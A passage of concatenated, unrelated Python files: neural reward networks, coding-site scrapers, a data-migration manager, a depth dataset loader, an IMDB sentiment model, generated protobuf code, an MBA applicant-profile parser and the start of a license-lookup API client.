x = F.relu(self.fc1(x))
#r = torch.tanh(self.fc2(x)) #clip reward?
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
#Machado ICLR 2018 paper net
class BiggerNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(4, 64, 5, stride=2)
self.conv2 = nn.Conv2d(64, 64, 5, stride=2)
self.conv3 = nn.Conv2d(64, 64, 3, stride=1)
self.conv4 = nn.Conv2d(64, 64, 3, stride=1)
self.fc1 = nn.Linear(12544, 2048)
#self.fc1 = nn.Linear(1936,64)
self.fc2 = nn.Linear(2048, 512)
self.fc3 = nn.Linear(512,1)
def forward(self, obs):
'''feed forward through network to get logits for binary reward classification'''
x = obs.permute(0,3,1,2) #get into NCHW format
#compute forward pass of reward network
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = x.view(-1, 12544)
#x = x.view(-1, 1936)
x = F.relu(self.fc1(x))
#r = torch.tanh(self.fc2(x)) #clip reward?
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
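# A minimal sanity-check sketch for the reward networks above (illustrative
# only, never called). The 84x84x4 frame-stack size is an assumption inferred
# from the flattened feature sizes (784 = 16 * 7 * 7 for TrexNet); the helper
# pushes one random observation through TrexNet and returns the scalar output.
def _reward_net_demo():
    net = TrexNet()
    obs = torch.rand(1, 84, 84, 4)   # NHWC, the layout expected by forward()
    with torch.no_grad():
        reward = net(obs)
    return reward.shape              # torch.Size([1, 1])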
|
py | 7dfff8cacdf308a23afada0d8073c92c2f77d3fc | import urllib.request
import codecs
import json
from bs4 import BeautifulSoup
import requests
def uva(username):
# get the number of solved problems
reader = codecs.getreader("utf-8")
uid = str(reader(urllib.request.urlopen("https://uhunt.onlinejudge.org/api/uname2uid/"+username)).read())
submissions = urllib.request.urlopen("https://uhunt.onlinejudge.org/api/subs-user/"+uid)
obj = json.load(reader(submissions))
totalsolved = 0
solvedSet = set()
for i in obj['subs']:
if i[2] == 90 and i[0] not in solvedSet:
solvedSet.add(i[0])
return len(solvedSet)
def firecode(userid):
url = "https://www.firecode.io/pages/profile/"
content = requests.get(url+userid).content
soup = BeautifulSoup(content, "lxml")
table = soup.find("table", {"id": "problem-history"}).tbody
solvedSet = set()
for tr in table.find_all("tr"):
problem = ""
solved = False
a = tr.find_all('td')[1].find_all('a')
for i in a:
problem = i.text.strip()
b = tr.find_all('td')[2].find_all("img")
if not b:
solved = True
if solved:
solvedSet.add(problem)
return len(solvedSet)
def leetcode(username):
url = "https://leetcode.com/"
content = requests.get(url+username).content
soup = BeautifulSoup(content, "lxml")
i = soup.find("i",{"class":"fa fa-question fa-lg fa-fw"}).parent.find_all("span")
count = []
for e in i:
count = e.text.strip().split(" / ")
return int(count[0])
|
py | 7dfff8d66cb56225f5bc563fa214fc798edbfce3 | import logging
from typing import TYPE_CHECKING, Any, Callable, Dict, NamedTuple, Optional
from rotkehlchen.data_migrations.migrations.migration_1 import data_migration_1
from rotkehlchen.data_migrations.migrations.migration_2 import data_migration_2
from rotkehlchen.data_migrations.migrations.migration_3 import data_migration_3
from rotkehlchen.logging import RotkehlchenLogsAdapter
if TYPE_CHECKING:
from rotkehlchen.rotkehlchen import Rotkehlchen
logger = logging.getLogger(__name__)
log = RotkehlchenLogsAdapter(logger)
class MigrationRecord(NamedTuple):
version: int
function: Callable
kwargs: Optional[Dict[str, Any]] = None
MIGRATION_LIST = [
MigrationRecord(version=1, function=data_migration_1),
MigrationRecord(version=2, function=data_migration_2),
MigrationRecord(version=3, function=data_migration_3),
]
LAST_DATA_MIGRATION = len(MIGRATION_LIST)
class DataMigrationManager:
def __init__(self, rotki: 'Rotkehlchen'):
self.rotki = rotki
def maybe_migrate_data(self) -> None:
settings = self.rotki.data.db.get_settings()
current_migration = settings.last_data_migration
for migration in MIGRATION_LIST:
if current_migration < migration.version:
if self._perform_migration(migration) is False:
break # a migration failed -- no point continuing
current_migration += 1
                log.debug(f'Successfully applied migration {current_migration}')
self.rotki.data.db.conn.cursor().execute(
'INSERT OR REPLACE INTO settings(name, value) VALUES(?, ?)',
('last_data_migration', current_migration),
)
self.rotki.data.db.conn.commit()
def _perform_migration(self, migration: MigrationRecord) -> bool:
"""Performs a single data migration and returns boolean for success/failure"""
try:
kwargs = migration.kwargs if migration.kwargs is not None else {}
migration.function(rotki=self.rotki, **kwargs)
except BaseException as e: # lgtm[py/catch-base-exception]
error = f'Failed to run soft data migration to version {migration.version} due to {str(e)}' # noqa: E501
self.rotki.msg_aggregator.add_error(error)
return False
return True
|
py | 7dfff92cb5bc7779b923fd27641999225092d3ac |
from __future__ import absolute_import, division, print_function
import os
import skimage.transform
import numpy as np
import PIL.Image as pil
from path import Path
import matplotlib.pyplot as plt
from .mono_dataset import MonoDataset
class MCDataset_old(MonoDataset):
def __init__(self,*args,**kwargs):
        super(MCDataset_old, self).__init__(*args, **kwargs)
#self.full_res_shape = [1920,1080]#
#FOV = 35d
#960 = 1920/2
#960/fx = tan 35 =0.7-> fx = 1371
# 1920 * k[0] = 1371-> k0 = 0.714
# 1080 * k[1 ]= 1371 -> k1 = 1.27
#self.K=np.array([[0.714, 0, 0.5, 0],
# [0, 1.27, 0.5, 0],
# [0, 0, 1, 0],
# [0, 0, 0, 1]], dtype=np.float32)
self.full_res_shape = [800,600]#
#400/ fx = tan 35 =0.7 --> fx =571.428
#800 * k[0] = 571.428 ->> k0 = 0.714
#600* k1 = 571.428, k1 =0.952
self.K = np.array([[0.714, 0, 0.5, 0],
[0, 0.952, 0.5, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]], dtype=np.float32)
self.img_ext='.png'
self.depth_ext = '.png'
self.MaxDis = 255
self.MinDis = 0
def check_depth(self):
line = self.filenames[0].split()
scene_name = line[0]
frame_index = int(line[1])
depth_filename =Path(self.data_path)/scene_name/"depth"/"{:07d}.png".format(int(frame_index))
return depth_filename.exists()
def get_color(self, folder, frame_index, side, do_flip):
        path = self.get_image_path(folder, frame_index)
color = self.loader(path)
if do_flip:
color = color.transpose(pil.FLIP_LEFT_RIGHT)
return color
def get_image_path(self, folder, frame_index):
f_str = "{:04d}{}".format(frame_index, self.img_ext)
image_path = Path(self.data_path)/ folder/"color/{}".format(f_str)
return image_path
def get_depth(self, folder, frame_index, side, do_flip):
path = self.get_depth_path(folder, frame_index)
depth_gt = plt.imread(path)
depth_gt = skimage.transform.resize(depth_gt, self.full_res_shape[::-1], order=0, preserve_range=True, mode='constant')
if do_flip:
depth_gt = np.fliplr(depth_gt)
return depth_gt#[0~1]
def get_depth_path(self, folder, frame_index):
f_str = "{:04d}{}".format(frame_index, self.img_ext)
depth_path = Path(self.data_path) / folder / "depth/{}".format(f_str)
return depth_path
class MCDataset(MonoDataset):
def __init__(self,*args,**kwargs):
super(MCDataset,self).__init__(*args,**kwargs)
#self.full_res_shape = [1920,1080]#
#FOV = 35d
#960 = 1920/2
#960/fx = tan 35 =0.7-> fx = 1371
# 1920 * k[0] = 1371-> k0 = 0.714
# 1080 * k[1 ]= 1371 -> k1 = 1.27
#self.K=np.array([[0.714, 0, 0.5, 0],
# [0, 1.27, 0.5, 0],
# [0, 0, 1, 0],
# [0, 0, 0, 1]], dtype=np.float32)
        self.full_res_shape = [800, 600]
        # 400 / fx = tan(35 deg) = 0.7  ->  fx = 571.428
        # 800 * k[0] = 571.428  ->  k[0] = 0.714
        # 600 * k[1] = 571.428  ->  k[1] = 0.952
        # (see the _normalized_intrinsics sketch after this class)
self.K = np.array([[0.714, 0, 0.5, 0],
[0, 0.952, 0.5, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]], dtype=np.float32)
self.img_ext='.png'
self.depth_ext = '.png'
self.MaxDis = 255
self.MinDis = 0
def check_depth(self):
line = self.filenames[0].split()
scene_name = line[0]
frame_index = int(line[1])
depth_filename =Path(self.data_path)/scene_name/"depth"/"{:04d}.png".format(int(frame_index))
return depth_filename.exists()
def get_color(self, folder, frame_index, side, do_flip):
path =self.__get_image_path__(folder, frame_index)
color = self.loader(path)
if do_flip:
color = color.transpose(pil.FLIP_LEFT_RIGHT)
return color
def __get_image_path__(self, folder, frame_index):
f_str = "{:04d}{}".format(frame_index, self.img_ext)
image_path = Path(self.data_path)/ folder/"color/{}".format(f_str)
return image_path
def get_depth(self, folder, frame_index, side, do_flip):
path = self.__get_depth_path__(folder, frame_index)
depth_gt = plt.imread(path)
depth_gt = skimage.transform.resize(depth_gt, self.full_res_shape[::-1], order=0, preserve_range=True, mode='constant')
if do_flip:
depth_gt = np.fliplr(depth_gt)
return depth_gt#[0~1]
def __get_depth_path__(self, folder, frame_index):
f_str = "{:04d}{}".format(frame_index, self.img_ext)
depth_path = Path(self.data_path) / folder / "depth/{}".format(f_str)
return depth_path
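# A small helper sketch that reproduces the intrinsics arithmetic from the
# comments in __init__ above (added for illustration; the dataset classes do
# not call it). Treating the 35 degrees from those comments as the horizontal
# half-angle, fx = (width / 2) / tan(35 deg), and the normalized entries are
# K[0][0] = fx / width and K[1][1] = fx / height.
def _normalized_intrinsics(width=800, height=600, half_fov_deg=35.0):
    fx = (width / 2.0) / np.tan(np.radians(half_fov_deg))  # ~571.4 for 800x600
    return np.array([[fx / width, 0, 0.5, 0],
                     [0, fx / height, 0.5, 0],
                     [0, 0, 1, 0],
                     [0, 0, 0, 1]], dtype=np.float32)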
|
py | 7dfff9d20f27bb9ed699f1ad1ade0595aa9d4fd8 | import tensorflow as tf
from tensorflow import keras
import numpy as np
data = keras.datasets.imdb
(train_data, train_labels), (test_data, test_labels) = data.load_data(num_words = 10000)
# Here num_words = 10,000 essentially means that we have a vocabulary of 10000 words only.
# This also shrinks our data which makes it a little bit nicer :)
word_index = data.get_word_index()
# data.get_word_index() returns a dictionary mapping each word (string) to an integer index.
word_index = {k:(v+4) for k, v in word_index.items()}
# Shift every index up by 4 so that the special tokens defined below can use indices 0-4.
word_index["<PAD>"] = 0
# Here padding is used to make each movie review the same length.
word_index["<START>"] = 1
word_index["<UNK>"] = 2
# This is for the unknown characters that are not in the dictionary.
word_index["<UNUSED>"] = 3
word_index["<BREAK>"] = 4
reverse_word_index = dict([(value, key) for (key, value) in word_index.items()])
# This dictionary reverses word_index, so the integers now point to the words.
def decode_review(text):
return " ".join([reverse_word_index.get(i,"?") for i in text])
# This function decodes the review from integers to words that are present in the dictionary.
train_data = keras.preprocessing.sequence.pad_sequences(train_data, value = word_index["<PAD>"], padding = "post", maxlen = 270)
test_data = keras.preprocessing.sequence.pad_sequences(test_data, value = word_index["<PAD>"], padding = "post", maxlen = 270)
# This inbuilt keras function does the padding for train and test data.
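# A tiny toy example of the padding step (an added sketch, not part of the
# training flow and never called). A review shorter than maxlen gets the <PAD>
# index (0) appended after its real tokens because padding = "post"; a longer
# review would instead be truncated down to maxlen.
def _padding_demo():
    toy_review = [[1, 14, 22, 16]]  # a made-up encoded review, four tokens long
    padded = keras.preprocessing.sequence.pad_sequences(toy_review, value = word_index["<PAD>"], padding = "post", maxlen = 8)
    return padded  # expected contents: [[1, 14, 22, 16, 0, 0, 0, 0]]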
# Model down here
model = keras.Sequential()
model.add(keras.layers.Embedding(10000,16))
model.add(keras.layers.GlobalAveragePooling1D())
model.add(keras.layers.Dense(16, activation = "relu"))
model.add(keras.layers.Dense(1, activation = "sigmoid"))
# The sigmoid activation layer is the output layer (hypothesis) of the neural network which consists of
# one neuron which gives out the prediction as 0 or 1.
# Moreover in this layer the sigmoid function manages the probablities and returns the desired output.
# Some intuition behind the Embedding layer (see the small shape demo below):
# The Embedding layer tries to group words that are similar to each other.
# Mathematically, the Embedding layer learns a word vector for each word that we pass it.
# A word vector can live in a space of any dimension; here we've picked 16 dimensions for each word vector.
# Initially, we create 10000 word vectors, one for every single word in the vocabulary.
# When we call the Embedding layer, it grabs all of those word vectors for whatever input we have
# and uses them as the data that we pass on to the next layer.
# So it looks at the context the words have been used in and groups similar words together.
# The output of the Embedding layer is a 16-dimensional vector (16 coefficients) for each word.
# The GlobalAveragePooling1D() layer then scales the data down by averaging over the word dimension,
# because we have tons of words and each word gives a 16-dimensional output.
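# A small shape demo for the two layers discussed above (an added sketch; it is
# never called and does not affect the model being trained). It shows how a
# batch of padded reviews with shape (batch, 270) becomes (batch, 270, 16) word
# vectors inside the Embedding layer and is then averaged down to (batch, 16).
def _embedding_shape_demo():
    demo = keras.Sequential()
    demo.add(keras.layers.Embedding(10000, 16))        # (batch, 270) -> (batch, 270, 16)
    demo.add(keras.layers.GlobalAveragePooling1D())    # (batch, 270, 16) -> (batch, 16)
    fake_batch = np.random.randint(0, 10000, size = (2, 270))  # two made-up padded reviews
    return demo.predict(fake_batch).shape              # expected: (2, 16)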
model.summary()
model.compile(optimizer = "adam", loss = "binary_crossentropy", metrics = ["accuracy"])
x_val = train_data[:10000]
x_train = train_data[10000:]
y_val = train_labels[:10000]
y_train = train_labels[10000:]
fitModel = model.fit(x_train, y_train, epochs = 40, batch_size = 500, validation_data = (x_val, y_val), verbose = 1)
results = model.evaluate(test_data, test_labels)
model.save("imdb_reviews_model.h5")
print(results)
test_review = test_data[15]
predict = model.predict([test_review])
print("Review for test_data[15]:")
print(decode_review(test_review))
print("Prediction: " + str(predict[0]))
print("Actual: " + str(test_labels[15]))
print(results)
|
py | 7dfffbceae3ed651bb5fc94c54fccc9b3fae6719 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: object_detection/protos/eval.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='object_detection/protos/eval.proto',
package='object_detection.protos',
syntax='proto2',
serialized_pb=_b('\n\"object_detection/protos/eval.proto\x12\x17object_detection.protos\"\xab\x05\n\nEvalConfig\x12\x1e\n\x12num_visualizations\x18\x01 \x01(\r:\x02\x31\x30\x12\x1a\n\x0cnum_examples\x18\x02 \x01(\r:\x04\x35\x30\x30\x30\x12\x1f\n\x12\x65val_interval_secs\x18\x03 \x01(\r:\x03\x33\x30\x30\x12\x14\n\tmax_evals\x18\x04 \x01(\r:\x01\x30\x12\x19\n\nsave_graph\x18\x05 \x01(\x08:\x05\x66\x61lse\x12\"\n\x18visualization_export_dir\x18\x06 \x01(\t:\x00\x12\x15\n\x0b\x65val_master\x18\x07 \x01(\t:\x00\x12\x13\n\x0bmetrics_set\x18\x08 \x03(\t\x12\x15\n\x0b\x65xport_path\x18\t \x01(\t:\x00\x12!\n\x12ignore_groundtruth\x18\n \x01(\x08:\x05\x66\x61lse\x12\"\n\x13use_moving_averages\x18\x0b \x01(\x08:\x05\x66\x61lse\x12\"\n\x13\x65val_instance_masks\x18\x0c \x01(\x08:\x05\x66\x61lse\x12 \n\x13min_score_threshold\x18\r \x01(\x02:\x03\x30.5\x12&\n\x1amax_num_boxes_to_visualize\x18\x0e \x01(\x05:\x02\x32\x30\x12\x1a\n\x0bskip_scores\x18\x0f \x01(\x08:\x05\x66\x61lse\x12\x1a\n\x0bskip_labels\x18\x10 \x01(\x08:\x05\x66\x61lse\x12*\n\x1bvisualize_groundtruth_boxes\x18\x11 \x01(\x08:\x05\x66\x61lse\x12\x32\n#groundtruth_box_visualization_color\x18\x12 \x01(\t:\x05\x62lack\x12\x35\n&keep_image_id_for_visualization_export\x18\x13 \x01(\x08:\x05\x66\x61lse\x12$\n\x16retain_original_images\x18\x17 \x01(\x08:\x04true')
)
_EVALCONFIG = _descriptor.Descriptor(
name='EvalConfig',
full_name='object_detection.protos.EvalConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='num_visualizations', full_name='object_detection.protos.EvalConfig.num_visualizations', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=True, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='num_examples', full_name='object_detection.protos.EvalConfig.num_examples', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=True, default_value=5000,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='eval_interval_secs', full_name='object_detection.protos.EvalConfig.eval_interval_secs', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=True, default_value=300,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_evals', full_name='object_detection.protos.EvalConfig.max_evals', index=3,
number=4, type=13, cpp_type=3, label=1,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='save_graph', full_name='object_detection.protos.EvalConfig.save_graph', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='visualization_export_dir', full_name='object_detection.protos.EvalConfig.visualization_export_dir', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='eval_master', full_name='object_detection.protos.EvalConfig.eval_master', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='metrics_set', full_name='object_detection.protos.EvalConfig.metrics_set', index=7,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='export_path', full_name='object_detection.protos.EvalConfig.export_path', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ignore_groundtruth', full_name='object_detection.protos.EvalConfig.ignore_groundtruth', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_moving_averages', full_name='object_detection.protos.EvalConfig.use_moving_averages', index=10,
number=11, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='eval_instance_masks', full_name='object_detection.protos.EvalConfig.eval_instance_masks', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_score_threshold', full_name='object_detection.protos.EvalConfig.min_score_threshold', index=12,
number=13, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_num_boxes_to_visualize', full_name='object_detection.protos.EvalConfig.max_num_boxes_to_visualize', index=13,
number=14, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=20,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='skip_scores', full_name='object_detection.protos.EvalConfig.skip_scores', index=14,
number=15, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='skip_labels', full_name='object_detection.protos.EvalConfig.skip_labels', index=15,
number=16, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='visualize_groundtruth_boxes', full_name='object_detection.protos.EvalConfig.visualize_groundtruth_boxes', index=16,
number=17, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='groundtruth_box_visualization_color', full_name='object_detection.protos.EvalConfig.groundtruth_box_visualization_color', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("black").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='keep_image_id_for_visualization_export', full_name='object_detection.protos.EvalConfig.keep_image_id_for_visualization_export', index=18,
number=19, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='retain_original_images', full_name='object_detection.protos.EvalConfig.retain_original_images', index=19,
number=23, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=64,
serialized_end=747,
)
DESCRIPTOR.message_types_by_name['EvalConfig'] = _EVALCONFIG
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
EvalConfig = _reflection.GeneratedProtocolMessageType('EvalConfig', (_message.Message,), dict(
DESCRIPTOR = _EVALCONFIG,
__module__ = 'object_detection.protos.eval_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.EvalConfig)
))
_sym_db.RegisterMessage(EvalConfig)
# @@protoc_insertion_point(module_scope)
|
py | 7dfffcc61c49dcab2dd7e89d0b8dec3c202c05f1 | import re
import logging
from gre2gmat.conversions import gre2gmat
class ApplicantProfile():
def __init__(self, list_of_stats_text, odds_string):
self.uni = None
self.gmat_score = None
self.gpa = None
self.odds = None
self.age = None
self.race = None
self.gender = None
self.major = None
self.job_title = None
self.international = None
for stat in list_of_stats_text:
su = stat.upper()
            # the digit check makes sure we don't pick up extraneous comments that mention "GMAT" without a score
if 'GMAT' in su and bool(re.search('\d', su)) and (self.gmat_score is None):
self.gmat_score = self.parse_gmat(su)
elif ('GPA' in su or 'GRADE POINT AVERAGE' in su) and (bool(re.search('\d', su)) and self.gpa is None):
self.gpa = self.parse_gpa(su)
elif ('UNIVERSITY' in su or 'COLLEGE' in su or 'DEGREE' in su or 'INSTITUTE' in su) and (self.uni is None):
self.uni = self.parse_uni(su)
self.major = self.parse_major(su)
elif ('YEAR' in su) and (bool(re.search('\d', su)) and self.age is None):
self.age = self.parse_age(su)
self.race = self.parse_race(su)
self.gender = self.parse_gender(su)
self.odds = odds_string
for t in [self.uni, self.gmat_score, self.gpa]:
logging.info(str(t))
logging.info(self.odds)
"""
    Represent one applicant profile with this class; boss_setter() below sets every field explicitly (see the usage sketch after this class).
gpa_string: string of gpa
university_string: string of school they went to
gmat_string: a string because sometimes its represented as a __Q/__V other times as raw score
we will do some parsing depending on the format
job_title: defaults to None (financial analyst, engineer, software, teacher, consultant)
industry: which industry is the person in (finance, energy, marketing, automotive)
company: type of company, defaults to None (large well known, medium sized, start up, unicorn)
international: boolean. defaults to False -> U.S applicants
race: string representing race, may need parsing when we check out the raw text data
age: how old is the person featured
"""
def boss_setter(self, gpa_string, gmat_string, univeristy_string, odds_string, job_title=None, industry=None, company=None, international=False, race=None, age=None, gender=None, major=None):
# mandatory
self.gpa = self.parse_gpa(gpa_string)
self.gmat_score = self.parse_gmat(gmat_string)
self.uni = self.parse_uni(univeristy_string)
self.odds = odds_string
# optionals
self.job_title = job_title
self.industry = industry
self.company = company
self.international = international
self.race = race
self.age = age
self.gender = gender
self.major = major
def parse_major(self, major_str):
su = major_str.upper()
if 'ENGINEER' in su or 'COMPUTER' in su:
return 'Engineering'
elif 'ECON' in su:
return 'Economics'
elif 'FINANCE' in su or 'ACCOUNT' in su:
return 'Finance'
elif 'BUSINESS' in su:
return 'Business'
elif 'INTERNATIONAL' in su:
return 'International Studies'
elif 'EDUCATION' in su:
return 'Education'
elif 'PHILOSOPHY' in su:
return 'Philosophy'
elif 'POLITIC' in su and 'SCIENCE' in su:
return 'Political Science'
elif 'PUBLIC POLICY' in su:
return 'Public Policy'
elif 'JOURNAL' in su:
            return 'Journalism'
elif 'SCIENCE' in su or 'BIOLOGY' in su or 'CHEMISTRY' in su or 'PHYSIC' in su or 'MATH' in su:
return 'STEM'
elif 'FROM' in su:
split_major = su.split('FROM')
if len(split_major) > 1:
self.uni = self.parse_uni(split_major[1])
else:
try:
logging.warning("Didn't parse any major from: {}\n".format(major_str))
except UnicodeEncodeError:
pass
# not politically correct , will fix later and see how data comes out
def parse_gender(self, gender_str):
su = gender_str.upper()
if 'FE' in su or 'WOMAN' in su:
return 'Female'
# this order matters, since male is in female and man is in woman
elif 'MALE' in su or 'MAN' in su:
            return 'Male'
else:
try:
logging.warning("Could not parse sex from {}\n".format(gender_str))
except UnicodeEncodeError:
pass
return None
# basic & non researched, potentially problematic.. working on it.
def parse_race(self, race_str):
s = race_str.upper()
if('AFRICA' in s or 'BLACK' in s or 'GHAN' in s or 'NIGERI' in s):
return 'Black'
elif 'ASIA' in s or 'INDIA' in s:
return 'Asian'
elif ('HISPANIC' in s) or ('LATIN' in s):
return 'Latinx'
elif ('WHITE' in s):
return 'White'
else:
try:
                logging.warning("Didn't parse any race from: {}\n".format(race_str))
except UnicodeEncodeError:
pass
return None
def parse_age(self, age_str):
g = re.findall('[-+]?\d*\.\d+|\d+', age_str)
if len(g) > 0:
age = g[0]
if float(age) > 80 or float(age) < 18:
try:
logging.warning("Messed up age parsing: {}\n".format(age_str))
except UnicodeEncodeError:
pass
else:
return age
elif '-' in age_str and 'YEAR' in age_str.upper():
split_age = age_str.split('-')
age = split_age[0]
return age
try:
logging.warning("Could not age parse: {}\n".format(age_str))
except UnicodeEncodeError:
pass
return
# in progress lol, this is stupid.
def parse_uni(self, uni_str):
s = uni_str.upper()
# need to rework to have this be a list that allows you to update and add more entries
# this methodology is pretty bad. right now but ok for first pass.
if ('IVY' in s and not 'NEAR' in s) or ('M.I.T' in s) or ('COLUMBIA' in s) or ('YALE' in s) or ('STANFORD' in s) or ('HARVARD' in s):
return 'Tier 1'
elif 'NEAR' in s and 'IVY' in s:
return 'Tier 2'
else:
try:
logging.warning("Not enough info to parse university: {}".format(uni_str))
except UnicodeEncodeError:
pass
return 'Tier 3'
def parse_gpa(self, gpa_str):
# https://stackoverflow.com/questions/4703390/how-to-extract-a-floating-number-from-a-string
return re.findall('[-+]?\d*\.\d+|\d+', gpa_str)[0]
def parse_gmat(self, gmat_str):
s = gmat_str.upper()
if '/' in s:
v = 0
q = 0
            v_match = re.search(r'(\d+)\s*V', s)
            if v_match:
                v = int(v_match.group(1))
            q_match = re.search(r'(\d+)\s*Q', s)
            if q_match:
                q = int(q_match.group(1))
# try to convert a gre score to gmat (rough)
if(v != 0 and q != 0):
# using my pypi package! https://github.com/weAllWeGot/gre_to_gmat
rough_est = gre2gmat(gre_verbal=v, gre_quant=q)
rounded = rough_est
if rounded > 800:
return 800
else:
return rounded
else:
try:
logging.warning("Could not parse gmat: {}\n".format(gmat_str))
except UnicodeEncodeError:
pass
return None
elif 'GMAT' in s:
return int(re.findall('\d+', s)[0])
try:
logging.warning("Could not parse GMAT score from: {}\n".format(gmat_str))
except UnicodeEncodeError:
pass
return None
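# A hypothetical usage sketch (added for illustration; the strings below are
# made up and the parsing is only as good as the keyword checks above). The
# constructor takes the raw list of stat lines scraped for one applicant plus
# the odds string; boss_setter() can be used instead to set every field
# explicitly.
def _example_profile():
    stats = [
        '710 GMAT',
        '3.4 GPA',
        'economics degree from a near-Ivy university',
        '27-year-old white male',
    ]
    return ApplicantProfile(stats, '40% to 50%')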
|
py | 7dfffd41bf75df367cc9de5af97fba9b4e8e8630 | '''
Copyright 2020 Flexera Software LLC
See LICENSE.TXT for full license text
SPDX-License-Identifier: MIT
Created on Nov 1, 2019
@author: SGeary
'''
import logging
import requests
import sys
import config
logger = logging.getLogger(__name__)
#######################################################################
# If the calling app is a Flask app then we can use the Flask abort()
# function to report errors, so check whether FLASKAPP is defined in the
# shared config module (a sketch of such a config module follows below).
try:
FLASKAPP = config.FLASKAPP
except:
FLASKAPP = False
if FLASKAPP:
from flask import abort
#######################################################################
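#######################################################################
# The shared `config` module imported above is expected to provide at least
# BASEURL (the prefix of the FNCI REST endpoint) and, optionally, FLASKAPP.
# A minimal sketch of such a config module is shown below as a comment; the
# values are assumptions for illustration, not part of this script.
#
#     # config.py
#     BASEURL = "https://fnci.example.com/codeinsight/api/"   # hypothetical server
#     FLASKAPP = False   # set True when these helpers run inside a Flask app
#######################################################################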
FNCI_API = "FNCI License Lookup API"
ENDPOINT_URL = config.BASEURL + "license/lookup"
#-----------------------------------------------------------------------#
def lookup_license(licenseID, authToken):
logger.debug("Entering lookup_license with licenseID: %s" %(licenseID))
headers = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + authToken}
RESTAPI_URL = ENDPOINT_URL + "?licenseId=" + str(licenseID)
logger.debug(" RESTAPI_URL: %s" %RESTAPI_URL)
logger.debug(" headers: %s" %headers)
try:
response = requests.get(RESTAPI_URL, headers=headers)
response.raise_for_status()
except requests.exceptions.ConnectionError:
# Connection Error - Is the server up and running?
